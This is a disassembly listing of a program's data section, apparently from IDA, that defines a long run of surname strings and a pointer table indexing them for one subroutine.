aRoesler db 'Roesler',0 ; DATA XREF: _2:00447B84�o
aRogers db 'Rogers',0 ; DATA XREF: _2:00447B88�o
align 4
aRonen db 'Ronen',0 ; DATA XREF: _2:00447B8C�o
align 4
aRow db 'Row',0 ; DATA XREF: _2:00447B90�o
aRoyal db 'Royal',0 ; DATA XREF: _2:00447B94�o
align 10h
aRu db 'Ru',0 ; DATA XREF: _2:00447B98�o
align 4
aRuan db 'Ruan',0 ; DATA XREF: _2:00447B9C�o
align 4
aRuderman db 'Ruderman',0 ; DATA XREF: _2:00447BA0�o
align 4
aRuescher db 'Ruescher',0 ; DATA XREF: _2:00447BA4�o
align 4
aRush db 'Rush',0 ; DATA XREF: _2:00447BA8�o
align 4
aRyu db 'Ryu',0 ; DATA XREF: _2:00447BAC�o
aSabatello db 'Sabatello',0 ; DATA XREF: _2:00447BB0�o
align 4
aSadler db 'Sadler',0 ; DATA XREF: _2:00447BB4�o
align 4
aSafire db 'Safire',0 ; DATA XREF: _2:00447BB8�o
align 4
aSahu db 'Sahu',0 ; DATA XREF: _2:00447BBC�o
align 4
aSali db 'Sali',0 ; DATA XREF: _2:00447BC0�o
align 4
aSamson db 'Samson',0 ; DATA XREF: _2:00447BC4�o
align 4
aSanchezRamirez db 'Sanchez-Ramirez',0 ; DATA XREF: _2:00447BC8�o
aSanna db 'Sanna',0 ; DATA XREF: _2:00447BCC�o
align 4
aSapers db 'Sapers',0 ; DATA XREF: _2:00447BD0�o
align 4
aSarin db 'Sarin',0 ; DATA XREF: _2:00447BD4�o
align 4
aSartore db 'Sartore',0 ; DATA XREF: _2:00447BD8�o
aSase db 'Sase',0 ; DATA XREF: _2:00447BDC�o
align 4
aSatin db 'Satin',0 ; DATA XREF: _2:00447BE0�o
align 4
aSatta db 'Satta',0 ; DATA XREF: _2:00447BE4�o
align 4
aSatterthwaite db 'Satterthwaite',0 ; DATA XREF: _2:00447BE8�o
align 4
aSawtell db 'Sawtell',0 ; DATA XREF: _2:00447BEC�o
aSayied db 'Sayied',0 ; DATA XREF: _2:00447BF0�o
align 4
aScarponi db 'Scarponi',0 ; DATA XREF: _2:00447BF4�o
align 4
aScepan db 'Scepan',0 ; DATA XREF: _2:00447BF8�o
align 10h
aScharf db 'Scharf',0 ; DATA XREF: _2:00447BFC�o
align 4
aScharlemann db 'Scharlemann',0 ; DATA XREF: _2:00447C00�o
aScheiner db 'Scheiner',0 ; DATA XREF: _2:00447C04�o
align 10h
aSchiano db 'Schiano',0 ; DATA XREF: _2:00447C08�o
aSchifini db 'Schifini',0 ; DATA XREF: _2:00447C0C�o
align 4
aSchilling db 'Schilling',0 ; DATA XREF: _2:00447C10�o
align 10h
aSchmitt db 'Schmitt',0 ; DATA XREF: _2:00447C14�o
aSchossberger db 'Schossberger',0 ; DATA XREF: _2:00447C18�o
align 4
aSchuman db 'Schuman',0 ; DATA XREF: _2:00447C1C�o
aSchutte db 'Schutte',0 ; DATA XREF: _2:00447C20�o
aSchuyler db 'Schuyler',0 ; DATA XREF: _2:00447C24�o
align 4
aSchwan db 'Schwan',0 ; DATA XREF: _2:00447C28�o
align 4
aSchwickrath db 'Schwickrath',0 ; DATA XREF: _2:00447C2C�o
aScovel db 'Scovel',0 ; DATA XREF: _2:00447C30�o
align 10h
aScudder db 'Scudder',0 ; DATA XREF: _2:00447C34�o
aSeaton db 'Seaton',0 ; DATA XREF: _2:00447C38�o
align 10h
aSeeber db 'Seeber',0 ; DATA XREF: _2:00447C3C�o
align 4
aSegal db 'Segal',0 ; DATA XREF: _2:00447C40�o
align 10h
aSekler db 'Sekler',0 ; DATA XREF: _2:00447C44�o
align 4
aSelvage db 'Selvage',0 ; DATA XREF: _2:00447C48�o
aSen db 'Sen',0 ; DATA XREF: _2:00447C4C�o
aSennett db 'Sennett',0 ; DATA XREF: _2:00447C50�o
aSeterdahl db 'Seterdahl',0 ; DATA XREF: _2:00447C54�o
align 4
aSexton db 'Sexton',0 ; DATA XREF: _2:00447C58�o
align 10h
aSeyfert db 'Seyfert',0 ; DATA XREF: _2:00447C5C�o
aShaikh db 'Shaikh',0 ; DATA XREF: _2:00447C60�o
align 10h
aShakis db 'Shakis',0 ; DATA XREF: _2:00447C64�o
align 4
aShankland db 'Shankland',0 ; DATA XREF: _2:00447C68�o
align 4
aShanley db 'Shanley',0 ; DATA XREF: _2:00447C6C�o
aShar db 'Shar',0 ; DATA XREF: _2:00447C70�o
align 4
aShatrov db 'Shatrov',0 ; DATA XREF: _2:00447C74�o
aShavelson db 'Shavelson',0 ; DATA XREF: _2:00447C78�o
align 4
aShea db 'Shea',0 ; DATA XREF: _2:00447C7C�o
align 10h
aSheats db 'Sheats',0 ; DATA XREF: _2:00447C80�o
align 4
aShepherd db 'Shepherd',0 ; DATA XREF: _2:00447C84�o
align 4
aSheppard db 'Sheppard',0 ; DATA XREF: _2:00447C88�o
align 10h
aShepstone db 'Shepstone',0 ; DATA XREF: _2:00447C8C�o
align 4
aShesko db 'Shesko',0 ; DATA XREF: _2:00447C90�o
align 4
aShia db 'Shia',0 ; DATA XREF: _2:00447C94�o
align 4
aShibata db 'Shibata',0 ; DATA XREF: _2:00447C98�o
aShimon db 'Shimon',0 ; DATA XREF: _2:00447C9C�o
align 4
aSiesto db 'Siesto',0 ; DATA XREF: _2:00447CA0�o
align 4
aSigalot db 'Sigalot',0 ; DATA XREF: _2:00447CA4�o
aSigini db 'Sigini',0 ; DATA XREF: _2:00447CA8�o
align 4
aSigna db 'Signa',0 ; DATA XREF: _2:00447CAC�o
align 4
aSilverman db 'Silverman',0 ; DATA XREF: _2:00447CB0�o
align 4
aSilvetti db 'Silvetti',0 ; DATA XREF: _2:00447CB4�o
align 4
aSinsabaugh db 'Sinsabaugh',0 ; DATA XREF: _2:00447CB8�o
align 10h
aSirilli db 'Sirilli',0 ; DATA XREF: _2:00447CBC�o
aSites db 'Sites',0 ; DATA XREF: _2:00447CC0�o
align 10h
aSkane db 'Skane',0 ; DATA XREF: _2:00447CC4�o
align 4
aSkerry db 'Skerry',0 ; DATA XREF: _2:00447CC8�o
align 10h
aSkoda db 'Skoda',0 ; DATA XREF: _2:00447CCC�o
align 4
aSloan db 'Sloan',0 ; DATA XREF: _2:00447CD0�o
align 10h
aSlowe db 'Slowe',0 ; DATA XREF: _2:00447CD4�o
align 4
aSmilow db 'Smilow',0 ; DATA XREF: _2:00447CD8�o
align 10h
aSniffen db 'Sniffen',0 ; DATA XREF: _2:00447CDC�o
aSnodgrass db 'Snodgrass',0 ; DATA XREF: _2:00447CE0�o
align 4
aSocolow db 'Socolow',0 ; DATA XREF: _2:00447CE4�o
aSolon db 'Solon',0 ; DATA XREF: _2:00447CE8�o
align 4
aSomers db 'Somers',0 ; DATA XREF: _2:00447CEC�o
align 4
aSommariva db 'Sommariva',0 ; DATA XREF: _2:00447CF0�o
align 4
aSorabella db 'Sorabella',0 ; DATA XREF: _2:00447CF4�o
align 4
aSorg db 'Sorg',0 ; DATA XREF: _2:00447CF8�o
align 4
aSottak db 'Sottak',0 ; DATA XREF: _2:00447CFC�o
align 4
aSoukup db 'Soukup',0 ; DATA XREF: _2:00447D00�o
align 4
aSoule db 'Soule',0 ; DATA XREF: _2:00447D04�o
align 4
aSoultanian db 'Soultanian',0 ; DATA XREF: _2:00447D08�o
align 10h
aSpanier db 'Spanier',0 ; DATA XREF: _2:00447D0C�o
aSparrow db 'Sparrow',0 ; DATA XREF: _2:00447D10�o
aSpaulding db 'Spaulding',0 ; DATA XREF: _2:00447D14�o
align 4
aSpeizer db 'Speizer',0 ; DATA XREF: _2:00447D18�o
aSpence db 'Spence',0 ; DATA XREF: _2:00447D1C�o
align 4
aSperber db 'Sperber',0 ; DATA XREF: _2:00447D20�o
aSpicer db 'Spicer',0 ; DATA XREF: _2:00447D24�o
align 4
aSpiegelhalter db 'Spiegelhalter',0 ; DATA XREF: _2:00447D28�o
align 4
aSpiliotis db 'Spiliotis',0 ; DATA XREF: _2:00447D2C�o
align 4
aSpinrad db 'Spinrad',0 ; DATA XREF: _2:00447D30�o
aStmartin db 'StMartin',0 ; DATA XREF: _2:00447D34�o
align 4
aStalvey db 'Stalvey',0 ; DATA XREF: _2:00447D38�o
aStam db 'Stam',0 ; DATA XREF: _2:00447D3C�o
align 4
aStang db 'Stang',0 ; DATA XREF: _2:00447D40�o
align 4
aStassinopolus db 'Stassinopolus',0 ; DATA XREF: _2:00447D44�o
align 4
aStates db 'States',0 ; DATA XREF: _2:00447D48�o
align 4
aStatlender db 'Statlender',0 ; DATA XREF: _2:00447D4C�o
align 4
aStefani db 'Stefani',0 ; DATA XREF: _2:00447D50�o
aSteiner db 'Steiner',0 ; DATA XREF: _2:00447D54�o
aStephanian db 'Stephanian',0 ; DATA XREF: _2:00447D58�o
align 4
aStepniewska db 'Stepniewska',0 ; DATA XREF: _2:00447D5C�o
aStewartOaten db 'Stewart-Oaten',0 ; DATA XREF: _2:00447D60�o
align 10h
aStiepock db 'Stiepock',0 ; DATA XREF: _2:00447D64�o
align 4
aStillwell db 'Stillwell',0 ; DATA XREF: _2:00447D68�o
align 4
aStock db 'Stock',0 ; DATA XREF: _2:00447D6C�o
align 10h
aStockton db 'Stockton',0 ; DATA XREF: _2:00447D70�o
align 4
aStockwell db 'Stockwell',0 ; DATA XREF: _2:00447D74�o
align 4
aStolzenberg db 'Stolzenberg',0 ; DATA XREF: _2:00447D78�o
aStonich db 'Stonich',0 ; DATA XREF: _2:00447D7C�o
aStorer db 'Storer',0 ; DATA XREF: _2:00447D80�o
align 4
aStott db 'Stott',0 ; DATA XREF: _2:00447D84�o
align 4
aStrange db 'Strange',0 ; DATA XREF: _2:00447D88�o
aStrauch db 'Strauch',0 ; DATA XREF: _2:00447D8C�o
aStreiff db 'Streiff',0 ; DATA XREF: _2:00447D90�o
aStringer db 'Stringer',0 ; DATA XREF: _2:00447D94�o
align 10h
aSullivan db 'Sullivan',0 ; DATA XREF: _2:00447D98�o
align 4
aSumner db 'Sumner',0 ; DATA XREF: _2:00447D9C�o
align 4
aSuo db 'Suo',0 ; DATA XREF: _2:00447DA0�o
aSurdam db 'Surdam',0 ; DATA XREF: _2:00447DA4�o
align 10h
aSweeting db 'Sweeting',0 ; DATA XREF: _2:00447DA8�o
align 4
aSweetser db 'Sweetser',0 ; DATA XREF: _2:00447DAC�o
align 4
aSwindle db 'Swindle',0 ; DATA XREF: _2:00447DB0�o
aTagiuri db 'Tagiuri',0 ; DATA XREF: _2:00447DB4�o
aTai db 'Tai',0 ; DATA XREF: _2:00447DB8�o
aTalaugon db 'Talaugon',0 ; DATA XREF: _2:00447DBC�o
align 4
aTambiah db 'Tambiah',0 ; DATA XREF: _2:00447DC0�o
aTandler db 'Tandler',0 ; DATA XREF: _2:00447DC4�o
aTanowitz db 'Tanowitz',0 ; DATA XREF: _2:00447DC8�o
align 4
aTatar db 'Tatar',0 ; DATA XREF: _2:00447DCC�o
align 4
aTaveras db 'Taveras',0 ; DATA XREF: _2:00447DD0�o
aTawn db 'Tawn',0 ; DATA XREF: _2:00447DD4�o
align 4
aTcherepnin db 'Tcherepnin',0 ; DATA XREF: _2:00447DD8�o
align 4
aTeague db 'Teague',0 ; DATA XREF: _2:00447DDC�o
align 10h
aTemes db 'Temes',0 ; DATA XREF: _2:00447DE0�o
align 4
aTemmer db 'Temmer',0 ; DATA XREF: _2:00447DE4�o
align 10h
aTenney db 'Tenney',0 ; DATA XREF: _2:00447DE8�o
align 4
aTerracini db 'Terracini',0 ; DATA XREF: _2:00447DEC�o
align 4
aThan db 'Than',0 ; DATA XREF: _2:00447DF0�o
align 4
aThavaneswaran db 'Thavaneswaran',0 ; DATA XREF: _2:00447DF4�o
align 4
aTheodos db 'Theodos',0 ; DATA XREF: _2:00447DF8�o
aThibault db 'Thibault',0 ; DATA XREF: _2:00447DFC�o
align 10h
aThisted db 'Thisted',0 ; DATA XREF: _2:00447E00�o
aThomsen db 'Thomsen',0 ; DATA XREF: _2:00447E04�o
aThroop db 'Throop',0 ; DATA XREF: _2:00447E08�o
align 4
aTierney db 'Tierney',0 ; DATA XREF: _2:00447E0C�o
aTill db 'Till',0 ; DATA XREF: _2:00447E10�o
align 4
aTimmons db 'Timmons',0 ; DATA XREF: _2:00447E14�o
aTofallis db 'Tofallis',0 ; DATA XREF: _2:00447E18�o
align 4
aTollestrup db 'Tollestrup',0 ; DATA XREF: _2:00447E1C�o
align 4
aTolls db 'Tolls',0 ; DATA XREF: _2:00447E20�o
align 10h
aTolman db 'Tolman',0 ; DATA XREF: _2:00447E24�o
align 4
aTomford db 'Tomford',0 ; DATA XREF: _2:00447E28�o
aToomer db 'Toomer',0 ; DATA XREF: _2:00447E2C�o
align 4
aTopulos db 'Topulos',0 ; DATA XREF: _2:00447E30�o
aTorresi db 'Torresi',0 ; DATA XREF: _2:00447E34�o
aTorske db 'Torske',0 ; DATA XREF: _2:00447E38�o
align 10h
aTowler db 'Towler',0 ; DATA XREF: _2:00447E3C�o
align 4
aToye db 'Toye',0 ; DATA XREF: _2:00447E40�o
align 10h
aTraebert db 'Traebert',0 ; DATA XREF: _2:00447E44�o
align 4
aTrenga db 'Trenga',0 ; DATA XREF: _2:00447E48�o
align 4
aTrewin db 'Trewin',0 ; DATA XREF: _2:00447E4C�o
align 4
aTringali db 'Tringali',0 ; DATA XREF: _2:00447E50�o
align 4
aTroiani db 'Troiani',0 ; DATA XREF: _2:00447E54�o
aTroy db 'Troy',0 ; DATA XREF: _2:00447E58�o
align 4
aTruss db 'Truss',0 ; DATA XREF: _2:00447E5C�o
align 10h
aTsiatis db 'Tsiatis',0 ; DATA XREF: _2:00447E60�o
aTsomides db 'Tsomides',0 ; DATA XREF: _2:00447E64�o
align 4
aTsukurov db 'Tsukurov',0 ; DATA XREF: _2:00447E68�o
align 10h
aTuck db 'Tuck',0 ; DATA XREF: _2:00447E6C�o
align 4
aTudge db 'Tudge',0 ; DATA XREF: _2:00447E70�o
align 10h
aTukan db 'Tukan',0 ; DATA XREF: _2:00447E74�o
align 4
aTurano db 'Turano',0 ; DATA XREF: _2:00447E78�o
align 10h
aTurek db 'Turek',0 ; DATA XREF: _2:00447E7C�o
align 4
aTuttle db 'Tuttle',0 ; DATA XREF: _2:00447E80�o
align 10h
aTwells db 'Twells',0 ; DATA XREF: _2:00447E84�o
align 4
aTzamarias db 'Tzamarias',0 ; DATA XREF: _2:00447E88�o
align 4
aUllman db 'Ullman',0 ; DATA XREF: _2:00447E8C�o
align 4
aUntermeyer db 'Untermeyer',0 ; DATA XREF: _2:00447E90�o
align 4
aUpsdell db 'Upsdell',0 ; DATA XREF: _2:00447E94�o
aUrban db 'Urban',0 ; DATA XREF: _2:00447E98�o
align 4
aUrdangBrown db 'Urdang-Brown',0 ; DATA XREF: _2:00447E9C�o
align 4
aUsdan db 'Usdan',0 ; DATA XREF: _2:00447EA0�o
align 10h
aUzuner db 'Uzuner',0 ; DATA XREF: _2:00447EA4�o
align 4
aVacca db 'Vacca',0 ; DATA XREF: _2:00447EA8�o
align 10h
aWaite db 'Waite',0 ; DATA XREF: _2:00447EAC�o
align 4
aValberg db 'Valberg',0 ; DATA XREF: _2:00447EB0�o
aValencia db 'Valencia',0 ; DATA XREF: _2:00447EB4�o
align 4
aWales db 'Wales',0 ; DATA XREF: _2:00447EB8�o
align 4
aWallenberg db 'Wallenberg',0 ; DATA XREF: _2:00447EBC�o
align 10h
aWalter db 'Walter',0 ; DATA XREF: _2:00447EC0�o
align 4
aVanallen db 'vanAllen',0 ; DATA XREF: _2:00447EC4�o
align 4
aVanzwet db 'VanZwet',0 ; DATA XREF: _2:00447EC8�o
aVandenberg db 'Vandenberg',0 ; DATA XREF: _2:00447ECC�o
align 4
aVanheeckeren db 'Vanheeckeren',0 ; DATA XREF: _2:00447ED0�o
align 4
aWarshafsky db 'Warshafsky',0 ; DATA XREF: _2:00447ED4�o
align 4
aWasowska db 'Wasowska',0 ; DATA XREF: _2:00447ED8�o
align 10h
aVasquez db 'Vasquez',0 ; DATA XREF: _2:00447EDC�o
aWaugh db 'Waugh',0 ; DATA XREF: _2:00447EE0�o
align 10h
aWeighart db 'Weighart',0 ; DATA XREF: _2:00447EE4�o
align 4
aWeingarten db 'Weingarten',0 ; DATA XREF: _2:00447EE8�o
align 4
aWeinhaus db 'Weinhaus',0 ; DATA XREF: _2:00447EEC�o
align 4
aWeissbourd db 'Weissbourd',0 ; DATA XREF: _2:00447EF0�o
align 10h
aWeissman db 'Weissman',0 ; DATA XREF: _2:00447EF4�o
align 4
aVelasquez db 'Velasquez',0 ; DATA XREF: _2:00447EF8�o
align 4
aWelles db 'Welles',0 ; DATA XREF: _2:00447EFC�o
align 10h
aWelsh db 'Welsh',0 ; DATA XREF: _2:00447F00�o
align 4
aWengret db 'Wengret',0 ; DATA XREF: _2:00447F04�o
aVenne db 'Venne',0 ; DATA XREF: _2:00447F08�o
align 4
aVerghese db 'Verghese',0 ; DATA XREF: _2:00447F0C�o
align 4
aWescott db 'Wescott',0 ; DATA XREF: _2:00447F10�o
aWetzel db 'Wetzel',0 ; DATA XREF: _2:00447F14�o
align 4
aWhately db 'Whately',0 ; DATA XREF: _2:00447F18�o
aWhilton db 'Whilton',0 ; DATA XREF: _2:00447F1C�o
aWhite db 'White',0 ; DATA XREF: _2:00447F20�o
align 4
aWhitla db 'Whitla',0 ; DATA XREF: _2:00447F24�o
align 4
aWhittaker db 'Whittaker',0 ; DATA XREF: _2:00447F28�o
align 10h
aViana db 'Viana',0 ; DATA XREF: _2:00447F2C�o
align 4
aViano db 'Viano',0 ; DATA XREF: _2:00447F30�o
align 10h
aWiedersheim db 'Wiedersheim',0 ; DATA XREF: _2:00447F34�o
aWiener db 'Wiener',0 ; DATA XREF: _2:00447F38�o
align 4
aViens db 'Viens',0 ; DATA XREF: _2:00447F3C�o
align 4
aVignola db 'Vignola',0 ; DATA XREF: _2:00447F40�o
aWilder db 'Wilder',0 ; DATA XREF: _2:00447F44�o
align 4
aWilhelm db 'Wilhelm',0 ; DATA XREF: _2:00447F48�o
aWilk db 'Wilk',0 ; DATA XREF: _2:00447F4C�o
align 4
aWilkin db 'Wilkin',0 ; DATA XREF: _2:00447F50�o
align 4
aWilkinson db 'Wilkinson',0 ; DATA XREF: _2:00447F54�o
align 10h
aVillarreal db 'Villarreal',0 ; DATA XREF: _2:00447F58�o
align 4
aWillstatter db 'Willstatter',0 ; DATA XREF: _2:00447F5C�o
aWilson db 'Wilson',0 ; DATA XREF: _2:00447F60�o
align 10h
aVitali db 'Vitali',0 ; DATA XREF: _2:00447F64�o
align 4
aViviani db 'Viviani',0 ; DATA XREF: _2:00447F68�o
aVoigt db 'Voigt',0 ; DATA XREF: _2:00447F6C�o
align 4
aWolk db 'Wolk',0 ; DATA XREF: _2:00447F70�o
align 10h
aVonhoffman db 'VonHoffman',0 ; DATA XREF: _2:00447F74�o
align 4
aWoo db 'Woo',0 ; DATA XREF: _2:00447F78�o
aWooden db 'Wooden',0 ; DATA XREF: _2:00447F7C�o
align 4
aWoods db 'Woods',0 ; DATA XREF: _2:00447F80�o
align 10h
aWoodsPowell db 'Woods-Powell',0 ; DATA XREF: _2:00447F84�o
align 10h
aVorhaus db 'Vorhaus',0 ; DATA XREF: _2:00447F88�o
aVotey db 'Votey',0 ; DATA XREF: _2:00447F8C�o
align 10h
aYacono db 'Yacono',0 ; DATA XREF: _2:00447F90�o
align 4
aYamane db 'Yamane',0 ; DATA XREF: _2:00447F94�o
align 10h
aYankee db 'Yankee',0 ; DATA XREF: _2:00447F98�o
align 4
aYarchuk db 'Yarchuk',0 ; DATA XREF: _2:00447F9C�o
aYates db 'Yates',0 ; DATA XREF: _2:00447FA0�o
align 4
aYbarra db 'Ybarra',0 ; DATA XREF: _2:00447FA4�o
align 10h
aYedidia db 'Yedidia',0 ; DATA XREF: _2:00447FA8�o
aYesson db 'Yesson',0 ; DATA XREF: _2:00447FAC�o
align 10h
aYetiv db 'Yetiv',0 ; DATA XREF: _2:00447FB0�o
align 4
aYoffe db 'Yoffe',0 ; DATA XREF: _2:00447FB4�o
align 10h
aYoo db 'Yoo',0 ; DATA XREF: _2:00447FB8�o
aYoukSee db 'Youk-See',0 ; DATA XREF: _2:00447FBC�o
align 10h
aYu db 'Yu',0 ; DATA XREF: _2:00447FC0�o
align 4
aZachary db 'Zachary',0 ; DATA XREF: _2:00447FC4�o
aZahedi db 'Zahedi',0 ; DATA XREF: _2:00447FC8�o
align 4
aZangwill db 'Zangwill',0 ; DATA XREF: _2:00447FCC�o
align 10h
aZegans db 'Zegans',0 ; DATA XREF: _2:00447FD0�o
align 4
aZerbini db 'Zerbini',0 ; DATA XREF: _2:00447FD4�o
aZoldak db 'Zoldak',0 ; DATA XREF: _2:00447FD8�o
align 4
aZucconi db 'Zucconi',0 ; DATA XREF: _2:00447FDC�o
aZurn db 'Zurn',0 ; DATA XREF: _2:00447FE0�o
align 4
aZwiers db 'Zwiers',0 ; DATA XREF: _2:00447FE4�o
align 10h
aZytowski db 'Zytowski',0 ; DATA XREF: _2:00447FE8�o
align 10h
off_446DB0 dd offset aAbdulrazak ; DATA XREF: sub_40AFAB+20�r
; "Abdulrazak"
dd offset aAckerman ; "Ackerman"
dd offset aAdams ; "Adams"
dd offset aAddison ; "Addison"
dd offset aAdelstein ; "Adelstein"
dd offset aAdibe ; "Adibe"
dd offset aAdorno ; "Adorno"
dd offset aAhlers ; "Ahlers"
dd offset aAlavi ; "Alavi"
dd offset aAlcorn ; "Alcorn"
dd offset aAlda ; "Alda"
dd offset aAleks ; "Aleks"
dd offset aAllison ; "Allison"
dd offset aAlongi ; "Alongi"
dd offset aAltavilla ; "Altavilla"
dd offset aAltenberger ; "Altenberger"
dd offset aAltenhofen ; "Altenhofen"
dd offset aAmaral ; "Amaral"
dd offset aAmatangelo ; "Amatangelo"
dd offset aAmeer ; "Ameer"
dd offset aAmsden ; "Amsden"
dd offset aAnand ; "Anand"
dd offset aAndel ; "Andel"
dd offset aAndo ; "Ando"
dd offset aAndrelus ; "Andrelus"
dd offset aAndron ; "Andron"
dd offset aAnfinrud ; "Anfinrud"
dd offset aAnsley ; "Ansley"
dd offset aAnthony ; "Anthony"
dd offset aAntos ; "Antos"
dd offset aArbia ; "Arbia"
dd offset aArduini ; "Arduini"
dd offset aArellano ; "Arellano"
dd offset aAristotle ; "Aristotle"
dd offset aArjas ; "Arjas"
dd offset aArky ; "Arky"
dd offset aAtkins ; "Atkins"
dd offset aAugustus ; "Augustus"
dd offset aAurelius ; "Aurelius"
dd offset aAxelrod ; "Axelrod"
dd offset aAxworthy ; "Axworthy"
dd offset aAyiemba ; "Ayiemba"
dd offset aAykroyd ; "Aykroyd"
dd offset aAyling ; "Ayling"
dd offset aAzima ; "Azima"
dd offset aBachmuth ; "Bachmuth"
dd offset aBackus ; "Backus"
dd offset aBady ; "Bady"
dd offset aBaglivo ; "Baglivo"
dd offset aBagnold ; "Bagnold"
dd offset aBailar ; "Bailar"
dd offset aBakanowsky ; "Bakanowsky"
dd offset aBaleja ; "Baleja"
dd offset aBallatori ; "Ballatori"
dd offset aBallew ; "Ballew"
dd offset aBaltz ; "Baltz"
dd offset aBanta ; "Banta"
dd offset aBarabesi ; "Barabesi"
dd offset aBarajas ; "Barajas"
dd offset aBaranczak ; "Baranczak"
dd offset aBaranowska ; "Baranowska"
dd offset aBarberi ; "Barberi"
dd offset aBarbetti ; "Barbetti"
dd offset aBarneson ; "Barneson"
dd offset aBarnett ; "Barnett"
dd offset aBarriola ; "Barriola"
dd offset aBarry ; "Barry"
dd offset aBartholomew ; "Bartholomew"
dd offset aBartolome ; "Bartolome"
dd offset aBartoo ; "Bartoo"
dd offset aBasavappa ; "Basavappa"
dd offset aBashevis ; "Bashevis"
dd offset aBatchelder ; "Batchelder"
dd offset aBaumiller ; "Baumiller"
dd offset aBayles ; "Bayles"
dd offset aBayo ; "Bayo"
dd offset aBeacon ; "Beacon"
dd offset aBeal ; "Beal"
dd offset aBean ; "Bean"
dd offset aBeckman ; "Beckman"
dd offset aBeder ; "Beder"
dd offset aBedford ; "Bedford"
dd offset aBehenna ; "Behenna"
dd offset aBelanger ; "Belanger"
dd offset aBelaoussof ; "Belaoussof"
dd offset aBelfer ; "Belfer"
dd offset aBelinCollart ; "Belin-Collart"
dd offset aBellavance ; "Bellavance"
dd offset aBellhouse ; "Bellhouse"
dd offset aBellini ; "Bellini"
dd offset aBelloc ; "Belloc"
dd offset aBenedictDye ; "Benedict-Dye"
dd offset aBergson ; "Bergson"
dd offset aBerkeJenkins ; "Berke-Jenkins"
dd offset aBernardo ; "Bernardo"
dd offset aBernassola ; "Bernassola"
dd offset aBernston ; "Bernston"
dd offset aBerrizbeitia ; "Berrizbeitia"
dd offset aBetti ; "Betti"
dd offset aBeynart ; "Beynart"
dd offset aBiagioli ; "Biagioli"
dd offset aBickel ; "Bickel"
dd offset aBinion ; "Binion"
dd offset aBir ; "Bir"
dd offset aBisema ; "Bisema"
dd offset aBisho ; "Bisho"
dd offset aBlackbourn ; "Blackbourn"
dd offset aBlackwell ; "Blackwell"
dd offset aBlagg ; "Blagg"
dd offset aBlakemore ; "Blakemore"
dd offset aBlanke ; "Blanke"
dd offset aBliss ; "Bliss"
dd offset aBlizard ; "Blizard"
dd offset aBloch ; "Bloch"
dd offset aBloembergen ; "Bloembergen"
dd offset aBloemhof ; "Bloemhof"
dd offset aBloxham ; "Bloxham"
dd offset aBlyth ; "Blyth"
dd offset aBolger ; "Bolger"
dd offset aBolick ; "Bolick"
dd offset aBollinger ; "Bollinger"
dd offset aBologna ; "Bologna"
dd offset aBoner ; "Boner"
dd offset aBonham ; "Bonham"
dd offset aBoniface ; "Boniface"
dd offset aBontempo ; "Bontempo"
dd offset aBook ; "Book"
dd offset aBookbinder ; "Bookbinder"
dd offset aBoone ; "Boone"
dd offset aBoorstin ; "Boorstin"
dd offset aBorack ; "Borack"
dd offset aBorden ; "Borden"
dd offset aBossi ; "Bossi"
dd offset aBothman ; "Bothman"
dd offset aBotosh ; "Botosh"
dd offset aBoudin ; "Boudin"
dd offset aBoudrot ; "Boudrot"
dd offset aBourneuf ; "Bourneuf"
dd offset aBowers ; "Bowers"
dd offset aBoxer ; "Boxer"
dd offset aBoyajian ; "Boyajian"
dd offset aBoyes ; "Boyes"
dd offset aBoyland ; "Boyland"
dd offset aBoym ; "Boym"
dd offset aBoyne ; "Boyne"
dd offset aBracalente ; "Bracalente"
dd offset aBradac ; "Bradac"
dd offset aBradach ; "Bradach"
dd offset aBrecht ; "Brecht"
dd offset aBreed ; "Breed"
dd offset aBrenan ; "Brenan"
dd offset aBrennan ; "Brennan"
dd offset aBrewer ; "Brewer"
dd offset aBrewer_0 ; "Brewer"
dd offset aBridgeman ; "Bridgeman"
dd offset aBridges ; "Bridges"
dd offset aBrinton ; "Brinton"
dd offset aBritz ; "Britz"
dd offset aBroca ; "Broca"
dd offset aBrook ; "Brook"
dd offset aBrzycki ; "Brzycki"
dd offset aBuchan ; "Buchan"
dd offset aBudding ; "Budding"
dd offset aBullard ; "Bullard"
dd offset aBunton ; "Bunton"
dd offset aBurden ; "Burden"
dd offset aBurdzy ; "Burdzy"
dd offset aBurke ; "Burke"
dd offset aBurridge ; "Burridge"
dd offset aBusetta ; "Busetta"
dd offset aByatt ; "Byatt"
dd offset aByerly ; "Byerly"
dd offset aByrd ; "Byrd"
dd offset aCage ; "Cage"
dd offset aCalnan ; "Calnan"
dd offset aCammelli ; "Cammelli"
dd offset aCammilleri ; "Cammilleri"
dd offset aCanley ; "Canley"
dd offset aCapanni ; "Capanni"
dd offset aCaperton ; "Caperton"
dd offset aCapocaccia ; "Capocaccia"
dd offset aCapodilupo ; "Capodilupo"
dd offset aCappuccio ; "Cappuccio"
dd offset aCapursi ; "Capursi"
dd offset aCaratozzolo ; "Caratozzolo"
dd offset aCarayannopoulo ; "Carayannopoulos"
dd offset aCarlin ; "Carlin"
dd offset aCarlos ; "Carlos"
dd offset aCarlyle ; "Carlyle"
dd offset aCarmichael ; "Carmichael"
dd offset aCaroti ; "Caroti"
dd offset aCarper ; "Carper"
dd offset aCartmill ; "Cartmill"
dd offset aCascio ; "Cascio"
dd offset aCase ; "Case"
dd offset aCaspar ; "Caspar"
dd offset aCastelda ; "Castelda"
dd offset aCavanagh ; "Cavanagh"
dd offset aCavell ; "Cavell"
dd offset aCeniceros ; "Ceniceros"
dd offset aCerioli ; "Cerioli"
dd offset aChapman ; "Chapman"
dd offset aCharles ; "Charles"
dd offset aCheang ; "Cheang"
dd offset aCherry ; "Cherry"
dd offset aChervinsky ; "Chervinsky"
dd offset aChiassino ; "Chiassino"
dd offset aChien ; "Chien"
dd offset aChildress ; "Childress"
dd offset aChilds ; "Childs"
dd offset aChinipardaz ; "Chinipardaz"
dd offset aChinman ; "Chinman"
dd offset aChristenson ; "Christenson"
dd offset aChristian ; "Christian"
dd offset aChristiano ; "Christiano"
dd offset aChristie ; "Christie"
dd offset aChristopher ; "Christopher"
dd offset aChu ; "Chu"
dd offset aChupasko ; "Chupasko"
dd offset aChurch ; "Church"
dd offset aCiampaglia ; "Ciampaglia"
dd offset aCicero ; "Cicero"
dd offset aCifarelli ; "Cifarelli"
dd offset aClaffey ; "Claffey"
dd offset aClancy ; "Clancy"
dd offset aClark ; "Clark"
dd offset aClement ; "Clement"
dd offset aClifton ; "Clifton"
dd offset aClow ; "Clow"
dd offset aCoblenz ; "Coblenz"
dd offset aCoito ; "Coito"
dd offset aColdren ; "Coldren"
dd offset aColella ; "Colella"
dd offset aCollard ; "Collard"
dd offset aCollis ; "Collis"
dd offset aCompton ; "Compton"
dd offset aCompton_0 ; "Compton"
